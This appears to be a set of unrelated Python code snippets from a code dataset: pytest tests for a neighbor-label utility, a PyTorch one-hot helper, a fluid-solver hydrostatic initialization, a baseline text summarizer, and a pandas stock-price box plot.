return atom_array, neighbors
def test_get_neighbor_representation_with_focus_atom(small_molecule):
atom_array, neighbors = small_molecule
expects = ['a-b', 'b-a.c', 'c-b', 'd-']
for i in range(len(expects)):
actual = wle_util.get_neighbor_representation(
i, atom_array, neighbors, True)
assert actual == expects[i]
def test_get_neighbor_representation_without_focus_atom(small_molecule):
atom_array, neighbors = small_molecule
expects = ['b', 'a.c', 'b', '']
for i in range(len(expects)):
actual = wle_util.get_neighbor_representation(
i, atom_array, neighbors, False)
assert actual == expects[i]
@pytest.mark.parametrize('label, expect', [
('a-b', 'a'),
('a-b.c', 'a'),
('aa-b', 'aa'),
('a-', 'a'),
('aa-', 'aa'),
])
def test_get_focus_node_label(label, expect):
actual = wle_util.get_focus_node_label(label)
assert actual == expect
@pytest.mark.parametrize('label', ['aa', 'a-a-a', 'a--'])
def test_get_focus_node_label_invalid(label):
with pytest.raises(ValueError):
wle_util.get_focus_node_label(label)
|
144491
|
import torch.nn.functional as F
import torch
def onehot(X,num_classes):
ident=torch.eye(num_classes,dtype=int)
X_onehot=ident[X]
return X_onehot
|
144507
|
from __future__ import print_function
import numpy as np
import sys
import mesh.patch as patch
from util import msg
def init_data(my_data, rp):
""" initialize the HSE problem """
msg.bold("initializing the HSE problem...")
# make sure that we are passed a valid patch object
if not isinstance(my_data, patch.CellCenterData2d):
print("ERROR: patch invalid in hse.py")
print(my_data.__class__)
sys.exit()
# get the density, momenta, and energy as separate variables
dens = my_data.get_var("density")
xmom = my_data.get_var("x-momentum")
ymom = my_data.get_var("y-momentum")
ener = my_data.get_var("energy")
gamma = rp.get_param("eos.gamma")
grav = rp.get_param("compressible.grav")
dens0 = rp.get_param("hse.dens0")
print("dens0 = ", dens0)
H = rp.get_param("hse.h")
# isothermal sound speed (squared)
cs2 = H*abs(grav)
# initialize the components, remember, that ener here is
# rho*eint + 0.5*rho*v**2, where eint is the specific
# internal energy (erg/g)
xmom[:, :] = 0.0
ymom[:, :] = 0.0
dens[:, :] = 0.0
# set the density to be stratified in the y-direction
myg = my_data.grid
p = myg.scratch_array()
for j in range(myg.jlo, myg.jhi+1):
dens[:, j] = dens0*np.exp(-myg.y[j]/H)
if j == myg.jlo:
p[:, j] = dens[:, j]*cs2
else:
p[:, j] = p[:, j-1] + 0.5*myg.dy*(dens[:, j] + dens[:, j-1])*grav
# set the energy
ener[:, :] = p[:, :]/(gamma - 1.0) + \
0.5*(xmom[:, :]**2 + ymom[:, :]**2)/dens[:, :]
def finalize():
""" print out any information to the user at the end of the run """
pass
|
144510
|
import sys
import os
sys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)), os.pardir, 'textrank'))
from summa.preprocessing.textcleaner import get_sentences # Uses textrank's method for extracting sentences.
BASELINE_WORD_COUNT = 100
def baseline(text):
""" Creates a baseline summary to be used as reference.
The baseline is set to an extract of the first 100 words.
"""
sentences = list(get_sentences(text))
baseline_summary = ""
word_count = 0
for sentence in sentences:
for word in sentence.split():
baseline_summary += word + " "
word_count += 1
if word_count == BASELINE_WORD_COUNT:
return baseline_summary
baseline_summary += "\n"
return baseline_summary
|
144609
|
import pandas as pd
import matplotlib.pyplot as plt
# Import our data file
stock_prices = pd.read_csv('/data/tesla.csv')
# Print stock_prices DataFrame for review
# print(stock_prices)
# Print using the .describe() method
# print(stock_prices.describe())
# Print the minimum value of Open
# print(stock_prices['Open'].min())
# Print the maximum value of Open
# print(stock_prices['Open'].max())
# Print the average or the mean value of Open
# print(stock_prices['Open'].mean())
stock_prices['Open'].plot(kind='box')
plt.show()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.